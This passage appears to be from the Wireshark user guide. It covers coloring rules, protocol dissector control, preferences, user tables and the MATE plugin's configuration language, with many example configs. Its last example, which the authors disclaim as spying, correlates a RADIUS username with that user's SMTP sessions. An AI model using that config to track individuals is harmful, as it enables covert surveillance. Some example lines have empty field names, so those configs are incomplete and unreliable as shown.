(Figure 11.2, “A color chooser”) for the foreground (text) and background colors respectively. The color chooser appearance depends on your operating system. The macOS color picker is shown. Select the color you desire for the selected packets and click OK. Figure 11.3, “Using color filters with Wireshark” shows an example of several color filters being used in Wireshark.
Note that the frame detail shows that the “Bad TCP” rule was applied, along with the matching filter. The user can control how protocols are dissected. Each protocol has its own dissector, so dissecting a complete packet will typically involve several dissectors. As Wireshark tries to find the right dissector for each packet (using static “routes” and heuristic “guessing”), it might choose the wrong dissector in your specific case. For example, Wireshark won’t know if you use a common protocol on an uncommon TCP port, e.g. using HTTP on TCP port 800 instead of the standard port 80. There are two ways to control the relations between protocol dissectors: disable a protocol dissector completely or temporarily divert the way Wireshark calls the dissectors. The Enabled Protocols dialog box lets you enable or disable specific protocols. Most protocols are enabled by default. When a protocol is disabled, Wireshark stops processing a packet whenever that protocol is encountered. To enable or disable protocols select Analyze → Enabled Protocols…. Wireshark will pop up the “Enabled Protocols” dialog box as shown in Figure 11.4, “The “Enabled Protocols” dialog box”. To disable or enable a protocol, simply click the checkbox using the mouse. Note that typing a few letters of the protocol name in the search box will limit the list to those protocols that contain these letters. You can choose from the following actions: The “Decode As” functionality lets you temporarily divert specific protocol dissections. This might be useful, for example, if you do some uncommon experiments on your network. Decode As is accessed by selecting Analyze → Decode As…. Wireshark will pop up the “Decode As” dialog box as shown in Figure 11.5, “The “Decode As” dialog box”. In this dialog you are able to edit entries by means of the edit buttons on the left. You can also pop up this dialog box from the context menu in the packet list or packet details. It will then contain a new line based on the currently selected packet.
These settings will be lost if you quit Wireshark or change profile unless you save the entries. There are a number of preferences you can set. Simply select Edit → Preferences… (Wireshark → Preferences… on macOS) and Wireshark will pop up the Preferences dialog box as shown in Figure 11.6, “The preferences dialog box”, with the “User Interface” page as default. On the left side is a tree where you can select the page to be shown. Wireshark supports quite a few protocols, which is reflected in the long list of entries in the “Protocols” pane. You can jump to the preferences for a specific protocol by expanding “Protocols” and quickly typing the first few letters of the protocol name. The “Advanced” pane will let you view and edit all of Wireshark’s preferences, similar to about:config and chrome:flags in the Firefox and Chrome web browsers. You can search for a preference by typing text into the “Search” entry. You can also pass preference names to Wireshark and TShark on the command line. For example, the gui.prepend_window_title preference can be used to differentiate between different instances of Wireshark: $ wireshark -o "gui.prepend_window_title:Internal Network" & $ wireshark -o "gui.prepend_window_title:External Network" & Configuration Profiles can be used to configure and use more than one set of preferences and configurations. Select the Edit → Configuration Profiles… menu item or press Shift+Ctrl+A or Shift+⌘+A (macOS) and Wireshark will pop up the Configuration Profiles dialog box as shown in Figure 11.8, “The configuration profiles dialog box”. It is also possible to click in the “Profile” part of the statusbar to pop up a menu with available Configuration Profiles (Figure 3.22, “The Statusbar with a configuration profile menu”). Configuration files stored in each profile include: User Accessible Tables: All other configurations are stored in the personal configuration folder and are common to all profiles.
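A profile can also be chosen at startup with the -C flag listed in the command-line reference above. A short sketch, assuming the two profile names already exist:

```shell
# Launch two instances, each using its own configuration profile and a
# distinguishing window title ("Internal Network"/"External Network"
# are example profile names):
wireshark -C "Internal Network" -o "gui.prepend_window_title:Internal" &
wireshark -C "External Network" -o "gui.prepend_window_title:External" &
```

Combining -C with -o this way keeps per-network coloring rules and filters in the profile while still overriding single preferences per instance.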
Profiles can be filtered between displaying “All profiles”, “Personal profiles” and “Global profiles”. The User Table editor is used for managing various tables in Wireshark. Its main dialog works very similarly to that of Section 11.3, “Packet colorization”. Display filter macros can be managed with a user table, as described in Section 11.7, “User Table”, by selecting Analyze → Display Filter Macros… from the menu. The User Table has the following fields: Wireshark uses this table to map ESS Security Category attributes to textual representations. The values to put in this table are usually found in an XML SPIF, which is used for defining security labels. This table is a user table, as described in Section 11.7, “User Table”, with the following fields: If your copy of Wireshark supports MaxMind’s MaxMindDB library, you can use their databases to match IP addresses to countries, cities, autonomous system numbers, and other bits of information. Some databases are available at no cost for registered users, while others require a licensing fee. See the MaxMind web site for more information. The configuration for the MaxMind database is a user table, as described in Section 11.7, “User Table”, with the following fields: The locations for your data files are up to you, but /usr/share/GeoIP and /var/lib/GeoIP are common on Linux, and C:\ProgramData\GeoIP and C:\Program Files\Wireshark\GeoIP might be good choices on Windows. Previous versions of Wireshark supported MaxMind’s original GeoIP Legacy database format. They were configured similarly to MaxMindDB files above, except GeoIP files must begin with Geo and end with .dat. They are no longer supported, and MaxMind stopped distributing GeoLite Legacy databases in April 2018. Wireshark can decrypt Encrypted Payloads of IKEv2 (Internet Key Exchange version 2) packets if the necessary information is provided. Note that you can decrypt only IKEv2 packets with this feature.
If you want to decrypt IKEv1 packets or ESP packets, use the Log Filename setting under the ISAKMP protocol preferences or the settings under the ESP protocol preferences, respectively. This is handled by a user table, as described in Section 11.7, “User Table”, with the following fields: Many protocols that use ASN.1 use Object Identifiers (OIDs) to uniquely identify certain pieces of information. In many cases, they are used in an extension mechanism so that new object identifiers (and associated values) may be defined without needing to change the base standard. While Wireshark has knowledge about many of the OIDs and the syntax of their associated values, the extensibility means that other values may be encountered. Wireshark uses this table to allow the user to define the name and syntax of Object Identifiers that Wireshark does not know about (for example, a privately defined X.400 extension). It also allows the user to override the name and syntax of Object Identifiers that Wireshark does know about (e.g. changing the name “id-at-countryName” to just “c”). This table is a user table, as described in Section 11.7, “User Table”, with the following fields: Wireshark uses this table to map a presentation context identifier to a given object identifier when the capture does not contain a PRES package with a presentation context definition list for the conversation. This table is a user table, as described in Section 11.7, “User Table”, with the following fields: Wireshark uses this table to map specific protocols to a certain DPC/SSN combination for SCCP. This table is a user table, as described in Section 11.7, “User Table”, with the following fields: If your copy of Wireshark supports libSMI, you can specify a list of MIB and PIB modules here. The COPS and SNMP dissectors can use them to resolve OIDs. If your copy of Wireshark supports libSMI, you can specify one or more paths to MIB and PIB modules here, e.g. /usr/local/snmp/mibs.
Wireshark automatically uses the standard SMI path for your system, so you usually don’t have to add anything here. Wireshark uses this table to map specific-trap values to user-defined descriptions in a Trap PDU. The description is shown in the packet details specific-trap element. This table is a user table, as described in Section 11.7, "User Table", with the following fields: Wireshark uses this table to verify authentication and to decrypt encrypted SNMPv3 packets. This table is a user table, as described in Section 11.7, "User Table", with the following fields: The Tektronix K12xx/15 rf5 file format uses helper files (*.stk) to identify the various protocols that are used by a certain interface. Wireshark doesn’t read these stk files; it uses a table that helps it identify which lowest layer protocol to use. Stk file to protocol matching is handled by a user table, as described in Section 11.7, "User Table", with the following fields: When a pcap file uses one of the user DLTs (147 to 162) Wireshark uses this table to know which protocol(s) to use for each user DLT. This table is a user table, as described in Section 11.7, "User Table", with the following fields: The binary wire format of Protocol Buffers (Protobuf) messages is not self-describing. For example, the varint wire type in a protobuf packet may be converted to the int32, int64, uint32, uint64, sint32, sint64, bool or enum field types of the protocol buffers language. Wireshark should be configured with Protocol Buffers language files (*.proto) to enable proper dissection of protobuf data (which may be the payload of gRPC) based on the message, enum and field definitions. You can specify protobuf search paths at the Protobuf protocol preferences. For example, say you defined a proto file with the path d:/my_proto_files/helloworld.proto, and helloworld.proto contains the line import "google/protobuf/any.proto"; because the any type of the official protobuf library is used.
And the real path of any.proto is d:/protobuf-3.4.1/include/google/protobuf/any.proto. You should add the d:/protobuf-3.4.1/include/ and d:/my_proto_files paths into the protobuf search paths. The configuration for the protobuf search paths is a user table, as described in Section 11.7, "User Table", with the following fields: d:/protobuf-3.4.1/include/ and d:/my_proto_files in Windows, or /usr/include/ and /home/alice/my_proto_files in Linux/UNIX. Library paths like d:/protobuf-3.4.1/include/ should not be set to load all files, as that may cause unnecessary memory use. If the payload of UDP on certain ports is Protobuf encoding, Wireshark uses this table to know which Protobuf message type should be used to parse the data on the specified UDP port(s). The configuration for UDP Port(s) to Protobuf message type maps is a user table, as described in Section 11.7, "User Table", with the following fields: Tips: You can create your own dissector to call the Protobuf dissector. If your dissector is written in C, you can pass the message type to the Protobuf dissector via the data parameter of the call_dissector_with_data() function. If your dissector is written in Lua, you can pass the message type to the Protobuf dissector via pinfo.private["pb_msg_type"]. The format of data and pinfo.private["pb_msg_type"] is "message," followed by the message type name. For example, in "message,helloworld.HelloRequest", helloworld is the package name and HelloRequest is the message type. Table of Contents MATE: a Wireshark plugin that allows the user to specify how different frames are related to each other. To do so, MATE extracts data from the frames': These are the steps to try out MATE: mate tcp_pdu:1→tcp_ses:1 or, at the prompt: path_to/wireshark -o "mate.config: tcp.mate" -r http.cap. If everything went well, your packet details might look something like this: MATE creates a filterable tree based on information contained in frames that share some relationship with information obtained from other frames.
The way these relationships are made is described in a configuration file. The configuration file tells MATE what makes a PDU and how to relate it to other PDUs. MATE analyzes each frame to extract relevant information from the "protocol" tree of that frame. The extracted information is contained in MATE PDUs; these contain a list of relevant attributes taken from the tree. From now on, I will use the term "PDU" to refer to the objects created by MATE containing the relevant information extracted from the frame; I’ll use "frame" to refer to the "raw" information extracted by the various dissectors that pre-analyzed the frame. For every PDU, MATE checks if it belongs to an existing "Group of PDUs" (Gop). If it does, it assigns the PDU to that Gop and moves any new relevant attributes to the Gop’s attribute list. How and when PDUs belong to Gops is described in the configuration file as well. Every time a Gop is assigned a new PDU, MATE will check if it matches the conditions to make it belong to a "Group of Groups" (Gog). Naturally the conditions that make a Gop belong to a Gog are taken from the configuration file as well. Once MATE is done analyzing the frame it will be able to create a "protocol" tree for each frame based on the PDUs, the Gops they belong to, and naturally any Gogs the former belong to. Telling MATE what to extract, how to group it and then how to relate those groups is done using AVPs and AVPLs. Information in MATE is contained in Attribute/Value Pairs (AVPs). AVPs are made of two strings: the name and the value. AVPs are used in the configuration and there they have an operator as well. There are various ways AVPs can be matched against each other using those operators. AVPs are grouped into AVP Lists (AVPLs). PDUs, Gops and Gogs have an AVPL each. Their AVPLs will be matched in various ways against others coming from the configuration file. MATE will be instructed how to extract AVPs from frames in order to create a PDU with an AVPL.
It will be instructed as well how to match that AVPL against the AVPLs of other similar PDUs in order to relate them. In MATE the relationship between PDUs is a Gop; it has an AVPL as well. MATE will be configured with other AVPLs to operate against the Gop’s AVPL to relate Gops together into Gogs. A good understanding of how AVPs and AVPLs work is fundamental to understanding how MATE works. Information used by MATE to relate different frames is contained in Attribute/Value Pairs (AVPs). AVPs are made of two strings - the name and the value. When AVPs are used in the configuration, an operator is defined as well. There are various ways AVPs can be matched against each other using those operators. avp_name="avp's value" another_name="1234 is the value" The name is a string used to refer to a "kind" of an AVP. Two AVPs won’t match unless their names are identical. You should not use uppercase characters in names, or names that start with “.” or “_”. Capitalized names are reserved for configuration parameters (we’ll call them keywords); nothing forbids you from using capitalized strings for other things as well but it probably would be confusing. I’ll avoid using capitalized words for anything but the keywords in this document, the reference manual, the examples and the base library. Names that start with a “.” would be very confusing as well because in the old grammar, AVPL transformations use names starting with a “.” to indicate they belong to the replacement AVPL. The value is a string that is either set in the configuration (for configuration AVPs) or by Wireshark while extracting interesting fields from a frame’s tree. The values extracted from fields use the same representation as they do in filter strings, except that no quotes are used. The name can contain only alphanumeric characters, "_", and ".". The name ends with an operator. The value will be dealt with as a string even if it is a number.
If there are any spaces in the value, the value must be between quotes "". ip_addr=10.10.10.11, tcp_port=1234, binary_data=01:23:45:67:89:ab:cd:ef, parameter12=0x23aa, parameter_with_spaces="this value has spaces" The way two AVPs with the same name might match is described by the operator. Remember two AVPs won’t match unless their names are identical. In MATE, match operations are always made between the AVPs extracted from frames (called data AVPs) and the configuration’s AVPs. The currently defined MATE AVP match operators are: An AVPL is a set of diverse AVPs that can be matched against other AVPLs. Every PDU, Gop and Gog has an AVPL that contains the information regarding it. The rules that MATE uses to group Pdus and Gops are AVPL operations. There will never be two identical AVPs in a given AVPL. However, we can have more than one AVP with the same name in an AVPL as long as their values are different. Some AVPL examples: ( addr=10.20.30.40, addr=192.168.0.1, tcp_port=21, tcp_port=32534, user_cmd=PORT, data_port=12344, data_addr=192.168.0.1 ) ( addr=10.20.30.40, addr=192.168.0.1, channel_id=22:23, message_type=Setup, calling_number=1244556673 ) ( addr=10.20.30.40, addr=192.168.0.1, ses_id=01:23:45:67:89:ab:cd:ef ) ( user_id=pippo, calling_number=1244556673, assigned_ip=10.23.22.123 ) In MATE there are two types of AVPLs: Data AVPLs can be operated against operation AVPLs in various ways: MATE’s analysis of a frame is performed in three phases: The extraction and matching logic comes from MATE’s configuration; MATE’s configuration file is declared by the mate.config preference. By default it is an empty string which means: do not configure MATE. The config file tells MATE what to look for in frames, how to make PDUs out of it, how PDUs will be related to other similar PDUs into Gops, and how Gops relate into Gogs. The MATE configuration file is a list of declarations. There are 4 types of declarations: Transform, Pdu, Gop and Gog.
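As a sketch of how the four declaration types fit together, a minimal configuration could look like the following. It reuses the dns_pdu and dns_req names that appear in the examples later in this chapter; the Transform and the Gog key used here are illustrative assumptions, not part of those examples.

Transform tag_response {
    Match (dns_resp=1) Insert (is_response);
};

Pdu dns_pdu Proto dns Transport ip {
    Extract addr From ip.addr;
    Extract dns_id From dns.id;
    Extract dns_resp From dns.flags.response;
    Transform tag_response;
};

Gop dns_req On dns_pdu Match (addr, addr, dns_id) {
    Start (dns_resp=0);
    Stop (dns_resp=1);
};

Gog dns_activity {
    Member dns_req (addr);
};

Done;

Each declaration type builds on the previous one: the Pdu declaration extracts AVPs, the Gop groups Pdus that share a key, the Gog groups Gops, and the optional Transform massages the AVPLs along the way.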
MATE will look in the tree of every frame to see if there is useful data to extract, and if there is, it will create one or more PDU objects containing the useful information. The first part of MATE’s analysis is the "PDU extraction"; there are various "Actions" that are used to instruct MATE what has to be extracted from the current frame’s tree into MATE’s PDUs. MATE will make a Pdu for each different proto field of Proto type present in the frame. MATE will fetch from the field’s tree those fields that are defined in the Section 12.8.1, “Pdu’s configuration actions” declaration whose initial offset in the frame is within the boundaries of the current Proto and those of the given Transport and Payload statements. Pdu dns_pdu Proto dns Transport ip { Extract addr From ip.addr; Extract dns_id From dns.id; Extract dns_resp From dns.flags.response; }; MATE will make a Pdu for each different proto field of Proto type present in the frame. MATE will fetch from the field’s tree those fields that are defined in the Section 12.8.1, “Pdu’s configuration actions” AVPL whose initial offset in the frame is within the boundaries of the current Proto and those of the various assigned Transports. Once MATE has found a Proto field for which to create a Pdu from the frame it will move backwards in the frame looking for the respective Transport fields. After that it will create AVPs named as each of those given in the rest of the AVPL for every instance of the fields declared as its values. Sometimes we need information from more than one Transport protocol. In that case MATE will check the frame backwards for the various Transport protocols in the given stack. MATE will choose only the closest transport boundary per "protocol" in the frame. This way we’ll have all Pdus for every Proto that appears in a frame match its relative transports.
Pdu isup_pdu Proto isup Transport mtp3/ip { Extract m3pc From mtp3.dpc; Extract m3pc From mtp3.opc; Extract cic From isup.cic; Extract addr From ip.addr; Extract isup_msg From isup.message_type; }; This allows assigning the right Transport to the Pdu, avoiding duplicate transport protocol entries (in case of tunneled ip over ip for example). Pdu ftp_pdu Proto ftp Transport tcp/ip { Extract addr From ip.addr; Extract port From tcp.port; Extract ftp_cmd From; }; Other than the mandatory Transport there is also an optional Payload statement, which works pretty much like Transport but refers to elements after the Proto's range. It is useful in those cases where the payload protocol might not appear in a Pdu but nevertheless the Pdu belongs to the same category. Pdu mmse_over_http_pdu Proto http Transport tcp/ip { Payload mmse; Extract addr From ip.addr; Extract port From tcp.port; Extract method From http.request.method; Extract content From http.content_type; Extract http_rq From http.request; Extract resp From http.response.code; Extract host From http.host; Extract trx From mmse.transaction_id; Extract msg_type From mmse.message_type; Extract notify_status From mmse.status; Extract send_status From mmse.response_status; }; There might be cases in which we won’t want MATE to create a PDU unless some of its extracted attributes meet or do not meet some criteria. For that we use the Criteria statements of the Pdu declarations. Pdu isup_pdu Proto isup Transport mtp3/ip { ... // MATE will create isup_pdu PDUs only when there is not a point code '1234' Criteria Reject Strict (m3pc=1234); }; Pdu ftp_pdu Proto ftp Transport tcp/ip { ... // MATE will create ftp_pdu PDUs only when they go to port 21 of our ftp_server Criteria Accept Strict (addr=10.10.10.10, port=21); }; The Criteria statement is given an action (Accept or Reject), a match mode (Strict, Loose or Every) and an AVPL against which to match the currently extracted one.
Once the fields have been extracted into the Pdu’s AVPL, MATE will apply any declared transformation to it. The way transforms are applied and how they work is described later on. However it’s useful to know that once the AVPL for the Pdu is created, it may be transformed before being analyzed. That way we can massage the data to simplify the analysis. Every successfully created Pdu will add a MATE tree to the frame dissection. If the Pdu is not related to any Gop, the tree for the Pdu will contain just the Pdu’s info; if it is assigned to a Gop, the tree will also contain the Gop items, and the same applies for the Gog level. mate dns_pdu:1 dns_pdu: 1 dns_pdu time: 3.750000 dns_pdu Attributes dns_resp: 0 dns_id: 36012 addr: 10.194.4.11 addr: 10.194.24.35 The Pdu’s tree contains some filterable fields; the tree will contain the various attributes of the Pdu as well. These will all be strings (to be used in filters as "10.0.0.1", not as 10.0.0.1). Once MATE has created the Pdus it passes to the Pdu analysis phase. During the PDU analysis phase MATE will try to group Pdus of the same type into 'Groups of Pdus' (aka Gops) and copy some AVPs from the Pdu’s AVPL to the Gop’s AVPL. Given a Pdu, the first thing MATE will do is to check if there is any Gop declaration in the configuration for the given Pdu type. If so, it will use its Match AVPL to match it against the Pdu’s AVPL; if they don’t match, the analysis phase is done. If there is a match, the AVPL is the Gop’s candidate key which will be used to search the Gop’s index for the Gop to which to assign the current PDU. If there is no such Gop and this Pdu does not match the Start criteria of a Gop declaration for the Pdu type, the Pdu will remain unassigned and only the analysis phase will be done.
Gop ftp_ses On ftp_pdu Match (addr, addr, port, port); Gop dns_req On dns_pdu Match (addr, addr, dns_id); Gop isup_leg On isup_pdu Match (m3pc, m3pc, cic); If there was a match, the candidate key will be used to search the Gop’s index to see if there is already a Gop matching the Gop’s key the same way. If there is such a match in the Gops collection, and the PDU doesn’t match the Start AVPL for its kind, the PDU will be assigned to the matching Gop. If it is a Start match, MATE will check whether or not that Gop has already been stopped. If the Gop has been stopped, a new Gop will be created and will replace the old one in the Gop’s index. Gop ftp_ses On ftp_pdu Match (addr, addr, port, port) { Start (ftp_cmd=USER); }; Gop dns_req On dns_pdu Match (addr, addr, dns_id) { Start (dns_resp=0); }; Gop isup_leg On isup_pdu Match (m3pc, m3pc, cic) { Start (isup_msg=1); }; If no Start is given for a Gop, a Pdu whose AVPL matches an existing Gop’s key will act as the start of a Gop. Once we know a Gop exists and the Pdu has been assigned to it, MATE will copy into the Gop’s AVPL all the attributes matching the key plus any AVPs of the Pdu’s AVPL matching the Extra AVPL. Gop ftp_ses On ftp_pdu Match (addr, addr, port, port) { Start (ftp_cmd=USER); Extra (pasv_prt, pasv_addr); }; Gop isup_leg On isup_pdu Match (m3pc, m3pc, cic) { Start (isup_msg=1); Extra (calling, called); }; Once the Pdu has been assigned to the Gop, MATE will check whether or not the Pdu matches the Stop; if it does, MATE will mark the Gop as stopped. Even after being stopped, a Gop may get assigned new Pdus matching its key, unless such a Pdu matches Start. If it does, MATE will instead create a new Gop starting with that Pdu.
Gop ftp_ses On ftp_pdu Match (addr, addr, port, port) { Start (ftp_cmd=USER); Stop (ftp_cmd=QUIT); // The response to the QUIT command will be assigned to the same Gop Extra (pasv_prt, pasv_addr); }; Gop dns_req On dns_pdu Match (addr, addr, dns_id) { Start (dns_resp=0); Stop (dns_resp=1); }; Gop isup_leg On isup_pdu Match (m3pc, m3pc, cic) { Start (isup_msg=1); // IAM Stop (isup_msg=16); // RLC Extra (calling, called); }; If no Stop criterion is stated for a given Gop, the Gop will be stopped as soon as it is created. However, as with any other Gop, Pdus matching the Gop’s key will still be assigned to the Gop unless they match a Start condition, in which case a new Gop using the same key will be created. For every frame containing a Pdu that belongs to a Gop, MATE will create a tree for that Gop. The example below represents the tree created by the dns_pdu and dns_req examples. ... mate dns_pdu:6->dns_req:1 dns_pdu: 6 dns_pdu time: 2.103063 dns_pdu time since beginning of Gop: 2.103063 dns_req: 1 dns_req Attributes dns_id: 36012 addr: 10.194.4.11 addr: 10.194.24.35 dns_req Times dns_req start time: 0.000000 dns_req hold time: 2.103063 dns_req duration: 2.103063 dns_req number of PDUs: 2 Start PDU: in frame 1 Stop PDU: in frame 6 (2.103063 : 2.103063) dns_pdu Attributes dns_resp: 1 dns_id: 36012 addr: 10.194.4.11 addr: 10.194.24.35 Other than the Pdu’s tree, this one contains information regarding the relationship between the Pdus that belong to the Gop. That way we have the timers of the Gop, and mate.dns_req.NumOfPdus, the number of Pdus that belong to this Gop. Note that there are two "timers" for a Gop. When Gops are created, or whenever their AVPL changes, Gops are (re)analyzed to check if they match an existing group of groups (Gog) or can create a new one. The Gop analysis is divided into two phases. In the first phase, the still unassigned Gop is checked to verify whether it belongs to an already existing Gog or may create a new one.
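For instance, with the dns_req Gop above, the attributes and counters shown in its tree can be used in display filters such as the following (remember that attribute values are matched as strings):

mate.dns_req.dns_id == "36012"
mate.dns_req.NumOfPdus == 2

The first filter selects all frames whose Pdus belong to the dns_req Gop with that transaction id; the second selects Gops that contain exactly two Pdus (a request and its response in this example).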
The second phase eventually checks the Gog and registers its keys in the Gogs index. There are several reasons for the author to believe that this feature needs to be reimplemented, so probably there will be deep changes in the way this is done in the near future. This section of the documentation reflects the version of MATE as of Wireshark 0.10.9; in future releases this will change. The first thing we have to do when configuring a Gog is to tell MATE that it exists. Gog web_use { ... }; Then we have to tell MATE what to look for when matching the candidate Gops. Gog web_use { Member http_ses (host); Member dns_req (host); }; Most often, attributes other than those used for matching are also interesting. To copy other interesting attributes from the Gop to the Gog, we can use Extra as we do for Gops. Gog web_use { ... Extra (cookie); }; mate http_pdu:4->http_req:2->http_use:1 http_pdu: 4 http_pdu time: 1.309847 http_pdu time since beginning of Gop: 0.218930 http_req: 2 ... (the gop's tree for http_req: 2) .. http_use: 1 http_use Attributes host: http_use Times http_use start time: 0.000000 http_use duration: 1.309847 number of GOPs: 3 dns_req: 1 ... (the gop's tree for dns_req: 1) .. http_req: 1 ... (the gop's tree for http_req: 1) .. http_req of current frame: 2 We can filter on: the attributes passed to the Gog A Transform is a sequence of Match rules optionally completed with modification of the match result by an additional AVPL. Such modification may be an Insert (merge) or a Replace. Transforms can be used as helpers to manipulate an item’s AVPL before it is processed further. They can be very helpful in several cases. AVPL Transformations are declared in the following way: Transform name { Match [Strict|Every|Loose] match_avpl [Insert|Replace] modify_avpl ; ... }; The name is the handle to the AVPL transformation. It is used to refer to the transform when invoking it later.
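Putting the fragments above together, the complete Gog declaration reads:

Gog web_use {
    Member http_ses (host);
    Member dns_req (host);
    Extra (cookie);
};

With this in place, every http_ses or dns_req Gop sharing the same host attribute is collected into one web_use Gog, and any cookie attribute found in a member Gop is copied up to the Gog.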
The Match declarations instruct MATE what and how to match against the data AVPL and how to modify the data AVPL if the match succeeds. They will be executed in the order they appear in the config file whenever they are invoked. The optional match mode qualifier (Strict, Every, or Loose) is used to choose the match mode as explained above; Strict is the default and may be omitted. The optional modification mode qualifier instructs MATE how the modify AVPL should be used: The modify_avpl may be an empty one; this is useful in some cases for both Insert and Replace modification modes. Examples: Transform insert_name_and { Match Strict (host=10.10.10.10, port=2345) Insert (name=JohnDoe); }; adds name=JohnDoe to the data AVPL if it contains host=10.10.10.10 and port=2345 Transform insert_name_or { Match Loose (host=10.10.10.10, port=2345) Insert (name=JohnDoe); }; adds name=JohnDoe to the data AVPL if it contains host=10.10.10.10 or port=2345 Transform replace_ip_address { Match (host=10.10.10.10) Replace (host=192.168.10.10); }; replaces the original host=10.10.10.10 by host=192.168.10.10 Transform add_ip_address { Match (host=10.10.10.10) (host=192.168.10.10); }; adds (inserts) host=192.168.10.10 to the AVPL, keeping the original host=10.10.10.10 in it too Transform replace_may_be_surprising { Match Loose (a=aaaa, b=bbbb) Replace (c=cccc, d=dddd); }; gives the following results: Once declared, Transforms can be added to the declarations of PDUs, Gops or Gogs. This is done by adding the Transform name_list statement to the declaration: Pdu my_proto_pdu Proto my_proto Transport ip { Extract addr From ip.addr; ... Transform my_pdu_transform[, other_pdu_transform[, yet_another_pdu_transform]]; }; MATE’s Transforms can be used for many different things, like: Using Transforms we can add more than one start or stop condition to a Gop.
Transform start_cond { Match (attr1=aaa,attr2=bbb) (msg_type=start); Match (attr3=www,attr2=bbb) (msg_type=start); Match (attr5^a) (msg_type=stop); Match (attr6$z) (msg_type=stop); }; Pdu pdu ... { ... Transform start_cond; } Gop gop ... { Start (msg_type=start); Stop (msg_type=stop); ... } Transform marks { Match (addr=10.10.10.10, user=john) (john_at_host); Match (addr=10.10.10.10, user=tom) (tom_at_host); } ... Gop my_gop ... { ... Transform marks; } After that we can use a display filter mate.gop.john_at_host or mate.gop.tom_at_host. Transform direction_as_text { Match (src=192.168.0.2, dst=192.168.0.3) Replace (direction=from_2_to_3); Match (src=192.168.0.3, dst=192.168.0.2) Replace (direction=from_3_to_2); }; Pdu my_pdu Proto my_proto Transport tcp/ip { Extract src From ip.src; Extract dst From ip.dst; Extract addr From ip.addr; Extract port From tcp.port; Extract start From tcp.flags.syn; Extract stop From tcp.flags.fin; Extract stop From tcp.flags.rst; Transform direction_as_text; } Gop my_gop On my_pdu Match (addr,addr,port,port) { ... Extra (direction); } NAT can create problems when tracing, but we can easily work around it by Transforming the NATed IP address and the Ethernet address of the router into the non-NAT address: Transform denat { Match (addr=192.168.0.5, ether=01:02:03:04:05:06) Replace (addr=123.45.67.89); Match (addr=192.168.0.6, ether=01:02:03:04:05:06) Replace (addr=123.45.67.90); Match (addr=192.168.0.7, ether=01:02:03:04:05:06) Replace (addr=123.45.67.91); } Pdu my_pdu Proto my_proto Transport tcp/ip/eth { Extract ether From eth.addr; Extract addr From ip.addr; Extract port From tcp.port; Transform denat; } MATE was originally written by Luis Ontanon, a Telecommunications systems troubleshooter, as a way to save time filtering out the packets of a single call from huge capture files using just the calling number.
Later he used the time he had saved to make it flexible enough to work with protocols other than the ones he was directly involved with. The complete config file is available on the Wireshark Wiki. Note: for this example I used dns.qry.name, which has been defined since Wireshark version 0.10.9. Supposing you have a MATE plugin already installed, you can test it with the current Wireshark version. http_ses's with the same host belong to the same Gog, and the same goes for dns_req's. So far we have instructed MATE to group every packet related to sessions towards a certain host. At this point, if we open a capture file and: Transforms are cumbersome, but they are very useful. The following is a collection of various configuration examples for MATE. Many of them are useless because the "conversations" facility does a better job. Anyway, they are meant to help users understand how to configure MATE. The following example creates a GoP out of every TCP session. Pdu tcp_pdu Proto tcp Transport ip { Extract addr From ip.addr; Extract port From tcp.port; Extract tcp_start From tcp.flags.syn; Extract tcp_stop From tcp.flags.reset; Extract tcp_stop From tcp.flags.fin; }; Gop tcp_ses On tcp_pdu Match (addr, addr, port, port) { Start (tcp_start=1); Stop (tcp_stop=1); }; Done; This probably would do fine in 99.9% of the cases, but 10.0.0.1:20→10.0.0.2:22 and 10.0.0.1:22→10.0.0.2:20 would both fall into the same Gop if they happen to overlap in time. This configuration allows tying a complete passive FTP session (including the data transfer) into a single Gog.
Pdu ftp_pdu Proto ftp Transport tcp/ip { Extract ftp_addr From ip.addr; Extract ftp_port From tcp.port; Extract ftp_resp From; Extract ftp_req From; Extract server_addr From; Extract server_port From; LastPdu; }; Pdu ftp_data_pdu Proto ftp-data Transport tcp/ip { Extract server_addr From ip.src; Extract server_port From tcp.srcport; }; Gop ftp_data On ftp_data_pdu (server_addr, server_port) { Start (server_addr); }; Gop ftp_ctl On ftp_pdu (ftp_addr, ftp_addr, ftp_port, ftp_port) { Start (ftp_resp=220); Stop (ftp_resp=221); Extra (server_addr, server_port); }; Gog ftp_ses { Member ftp_ctl (ftp_addr, ftp_addr, ftp_port, ftp_port); Member ftp_data (server_addr, server_port); }; Done; Note: not having anything to distinguish between ftp-data packets makes this config create one Gop for every ftp-data packet instead of one for each transfer. Pre-started Gops would avoid this. Spying on people, in addition to being immoral, is illegal in many countries. This is an example meant to explain how it is done, not an invitation to do so. It’s up to the police to do this kind of job when there is a good reason to do so.
Pdu radius_pdu Proto radius Transport udp/ip { Extract addr From ip.addr; Extract port From udp.port; Extract radius_id From radius.id; Extract radius_code From radius.code; Extract user_ip From radius.framed_addr; Extract username From radius.username; } Gop radius_req On radius_pdu (radius_id, addr, addr, port, port) { Start (radius_code {1|4|7} ); Stop (radius_code {2|3|5|8|9} ); Extra (user_ip, username); } // we define the smtp traffic we want to filter Pdu user_smtp Proto smtp Transport tcp/ip { Extract user_ip From ip.addr; Extract smtp_port From tcp.port; Extract tcp_start From tcp.flags.syn; Extract tcp_stop From tcp.flags.reset; } Gop user_smtp_ses On user_smtp (user_ip, user_ip, smtp_port!25) { Start (tcp_start=1); Stop (tcp_stop=1); } // with the following group of groups we'll group together the radius and the smtp // we set a long expiration to avoid the session expiring on long pauses. Gog user_mail { Expiration 1800; Member radius_req (user_ip); Member user_smtp_ses (user_ip); Extra (username); } Done; Filtering the capture file with mate.user_mail.username == "theuser" will filter the radius packets and smtp traffic for "theuser". This configuration will create a Gog out of every call.
